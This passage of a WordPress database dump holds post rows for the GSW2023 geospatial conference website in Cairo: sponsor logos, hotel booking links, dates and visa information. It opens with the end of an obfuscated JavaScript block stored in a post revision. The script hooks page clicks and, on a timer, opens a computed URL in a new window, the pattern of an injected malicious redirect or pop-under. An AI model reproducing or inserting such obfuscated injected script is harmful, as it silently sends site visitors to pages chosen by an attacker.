Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:49:45','2023-06-24 01:49:45','',3066,'https://gsw2023.com/?p=4808',0,'revision','',0),
(4809,1,'2023-06-24 01:50:30','2023-06-24 01:50:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687570910477{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>&nbsp;[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571355828{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 